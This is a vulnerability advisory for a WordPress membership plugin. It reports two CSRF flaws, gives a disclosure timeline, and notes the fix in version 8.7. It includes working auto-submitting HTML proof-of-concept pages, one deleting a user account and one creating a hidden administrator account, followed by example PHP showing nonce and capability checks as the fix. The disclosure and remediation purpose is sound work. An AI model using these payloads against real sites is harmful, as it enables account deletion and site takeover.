While confirming that the issues from https://wpvulndb.com/vulnerabilities/10086 have been remediated, two CSRF issues were identified, allowing attackers to make a logged-in administrator delete arbitrary accounts, as well as create a new administrator account. Other CSRF issues may be present but haven't been checked.

February 17th, 2020 - Envato notified
February 22nd, 2020 - New version released (8.7), fixing the reported issues, as well as putting CSRF checks on all other actions as per recommendations.
Proof of concept - delete an arbitrary account (user ID 5):

<html>
  <body onload="document.forms[0].submit();">
    <form action="https://example.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST">
      <input type="hidden" name="ihc_limit" value="25" />
      <input type="hidden" name="delete_users[]" value="5" />
      <input type="hidden" name="delete" value="Delete" />
    </form>
  </body>
</html>

Proof of concept - create a new administrator account:

<html>
  <!-- Account will not show up in the plugin's users list (because of admin role), but will be in the WP users list -->
  <body onload="document.forms[0].submit();">
    <form action="https://example.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="user_login" value="admin-csrf" />
      <input type="hidden" name="user_email" value="[email protected]" />
      <input type="hidden" name="first_name" value="Admin" />
      <input type="hidden" name="last_name" value="CSRF" />
      <input type="hidden" name="pass1" value="Passw0rd" />
      <input type="hidden" name="pass2" value="Passw0rd" />
      <input type="hidden" name="role" value="administrator" />
      <input type="hidden" name="ihc_user_levels" value="-1" />
      <input type="hidden" name="ihc_overview_post" value="-1" />
      <input type="hidden" name="Submit" value="Register" />
    </form>
  </body>
</html>
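The fix the timeline refers to ("CSRF checks on all other actions") is a WordPress nonce plus a capability check on every state-changing admin action. The following is an added illustration, not code from the plugin: a hypothetical delete-users handler in its vulnerable form beside a hardened one; the function names, the nonce action name and the nonce field name are assumptions.

```php
<?php
// Added illustration, not plugin code. Function names, nonce action and field
// name ("ihc_example_*") are assumed for this example.

// Vulnerable pattern: the POST is processed because the victim's session
// cookie is attached, so a form on any other site can trigger it.
function ihc_example_delete_users_vulnerable() {
    if ( isset( $_POST['delete'] ) && ! empty( $_POST['delete_users'] ) ) {
        foreach ( (array) $_POST['delete_users'] as $uid ) {
            wp_delete_user( (int) $uid );
        }
    }
}

// Hardened pattern, step 1: the form embeds a nonce tied to this action and
// to the current user. A cross-site page cannot read it.
function ihc_example_users_form() {
    $action_url = admin_url( 'admin.php?page=ihc_manage&tab=users' );
    echo '<form method="post" action="' . esc_url( $action_url ) . '">';
    wp_nonce_field( 'ihc_example_delete_users', 'ihc_example_nonce' );
    // ... delete_users[] checkboxes and a submit button named "delete" ...
    echo '</form>';
}

// Hardened pattern, step 2: the handler verifies the nonce and the capability
// before touching any account.
function ihc_example_delete_users_hardened() {
    if ( ! isset( $_POST['delete'] ) ) {
        return;
    }
    // Calls wp_die() unless a valid nonce for this action/user was submitted.
    check_admin_referer( 'ihc_example_delete_users', 'ihc_example_nonce' );

    // The nonce proves intent, not authority: still check the capability.
    if ( ! current_user_can( 'delete_users' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'ihc-example' ) );
    }

    $current = get_current_user_id();
    foreach ( (array) $_POST['delete_users'] as $uid ) {
        $uid = absint( $uid );
        if ( $uid && $uid !== $current ) {   // never let a request delete the actor
            wp_delete_user( $uid );
        }
    }
}
```

The same two checks apply to the account-creation action; there, the capability to require is `create_users` (and `promote_users` before honouring a submitted `role` value).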
ErwanLR
Yes
2020-02-24 (about 2 years ago)
2020-02-24 (about 2 years ago)
2020-03-07 (about 2 years ago)